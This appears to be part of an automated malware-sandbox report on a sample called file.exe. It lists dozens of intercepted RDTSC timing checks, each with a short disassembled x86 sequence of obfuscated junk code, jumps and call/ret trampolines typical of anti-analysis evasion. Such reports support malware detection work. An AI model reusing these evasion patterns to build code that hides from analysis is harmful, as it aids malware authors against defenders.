Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C3C3 second address: D8C3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F070E5D4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C3DD second address: D8C3F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB0Dh 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C3F7 second address: D8C41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 jmp 00007F70F070E5D0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C804 second address: D8C808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C808 second address: D8C81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CB03 second address: D8CB0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CB0B second address: D8CB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007F70F070E5C6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jnl 00007F70F070E5C8h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jc 00007F70F070E5C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CB2E second address: D8CB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8CB33 second address: D8CB38 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8FCCD second address: D8FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8FCDD second address: D8FCFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F70F070E5CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jc 00007F70F070E5C6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8FCFB second address: D8FD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91A5C second address: D91A61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91AF2 second address: D91B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F70F0BCDB17h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91B19 second address: D91B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91B20 second address: D91B40 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F70F0BCDB13h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91B40 second address: D91B70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F070E5D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91B70 second address: D91B8C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91B8C second address: D91BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9201F second address: D92023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92023 second address: D92035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jp 00007F70F070E5C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92190 second address: D921B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D921B4 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D921B8 second address: D921BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D921BC second address: D921C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92690 second address: D926E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F70F0BCDB0Bh 0x0000000f jmp 00007F70F0BCDB19h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F0BCDB19h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D927A0 second address: D927A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92957 second address: D9295D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92C1C second address: D92C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92C20 second address: D92C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D92C2B second address: D92C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F70F070E5C8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D2D5Dh] 0x00000032 mov edi, dword ptr [ebp+122D2C05h] 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F70F070E5CAh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93A5F second address: D93A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F70F0BCDB0Bh 0x00000011 jo 00007F70F0BCDB0Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93A7E second address: D93AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F70F070E5C8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jp 00007F70F070E5C7h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F70F070E5C8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D2E84h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b pushad 0x0000004c js 00007F70F070E5C6h 0x00000052 push edx 0x00000053 pop esi 0x00000054 popad 0x00000055 pop esi 0x00000056 xchg eax, ebx 0x00000057 jnp 00007F70F070E5CCh 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D96003 second address: D96038 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jg 00007F70F0BCDB10h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D38D0h], edx 0x00000017 push 00000000h 0x00000019 jg 00007F70F0BCDB0Ch 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9687B second address: D9687F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9809D second address: D980A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980A1 second address: D980ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F70F070E5C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 add dword ptr [ebp+124843FBh], edi 0x0000002c push 00000000h 0x0000002e jmp 00007F70F070E5D1h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980ED second address: D980F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980F3 second address: D980F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980F7 second address: D98117 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB15h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C770 second address: D9C774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9B960 second address: D9B964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9D78A second address: D9D830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F70F070E5CCh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F70F070E5C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F70F070E5C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 movzx ebx, cx 0x00000049 push 00000000h 0x0000004b mov edi, dword ptr [ebp+122D1C19h] 0x00000051 mov ebx, 3D2AA4E7h 0x00000056 xchg eax, esi 0x00000057 js 00007F70F070E5D9h 0x0000005d push edi 0x0000005e jmp 00007F70F070E5D1h 0x00000063 pop edi 0x00000064 push eax 0x00000065 pushad 0x00000066 push esi 0x00000067 push edi 0x00000068 pop edi 0x00000069 pop esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F70F070E5D0h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9DA11 second address: D9DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E920 second address: D9E98E instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5C8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub ebx, 23179EF6h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jng 00007F70F070E5CBh 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov di, A832h 0x0000002d mov eax, dword ptr [ebp+122D0439h] 0x00000033 mov ebx, 0023935Ah 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F70F070E5C8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jbe 00007F70F070E5C6h 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9DA2C second address: D9DA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA075D second address: DA076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F95B second address: D9F9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F70F0BCDB08h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D2CB9h] 0x00000029 mov ebx, esi 0x0000002b push dword ptr fs:[00000000h] 0x00000032 pushad 0x00000033 mov dword ptr [ebp+1244DC56h], ebx 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F70F0BCDB08h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov eax, dword ptr [ebp+122D160Dh] 0x00000061 pushad 0x00000062 movzx eax, si 0x00000065 mov edx, ecx 0x00000067 popad 0x00000068 push FFFFFFFFh 0x0000006a sub dword ptr [ebp+122D307Eh], ecx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9E0 second address: D9F9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9E4 second address: D9F9E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9E8 second address: D9F9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9EE second address: D9F9F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA167C second address: DA1685 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA1685 second address: DA168B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA168B second address: DA1697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA1697 second address: DA169B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D43E5C second address: D43E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F70F070E5D3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA18E4 second address: DA18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3E68 second address: DA3E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3E6C second address: DA3EB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F70F0BCDB08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov edi, 6A9E777Ah 0x00000027 push 00000000h 0x00000029 mov bl, al 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D311Eh], ecx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jno 00007F70F0BCDB0Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3EB1 second address: DA3EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3EB7 second address: DA3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3EBB second address: DA3EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3FC4 second address: DA3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3FD5 second address: DA4071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx edi, bx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov bx, 1B47h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007F70F070E5C8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000014h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d xor edi, dword ptr [ebp+122D5837h] 0x00000043 mov eax, dword ptr [ebp+122D0B0Dh] 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007F70F070E5C8h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 sub ebx, dword ptr [ebp+122D2D49h] 0x00000069 pushad 0x0000006a mov edi, 3C9E7304h 0x0000006f mov di, 319Ch 0x00000073 popad 0x00000074 push FFFFFFFFh 0x00000076 mov ebx, 5694AD65h 0x0000007b nop 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f jp 00007F70F070E5C6h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA4071 second address: DA4075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA91B0 second address: DA91B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA833E second address: DA8348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAC3C4 second address: DAC466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F70F070E5C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jmp 00007F70F070E5D7h 0x0000002c push 00000000h 0x0000002e jmp 00007F70F070E5D0h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F70F070E5C8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f and ebx, dword ptr [ebp+122D3147h] 0x00000055 mov ebx, dword ptr [ebp+122D2BA9h] 0x0000005b xchg eax, esi 0x0000005c jmp 00007F70F070E5CDh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007F70F070E5CCh 0x0000006a jp 00007F70F070E5C6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA59B second address: DAA5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jo 00007F70F0BCDB27h 0x0000000f pushad 0x00000010 jmp 00007F70F0BCDB19h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB53B second address: DAB53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB53F second address: DAB543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB543 second address: DAB549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3EEE2 second address: D3EEEC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
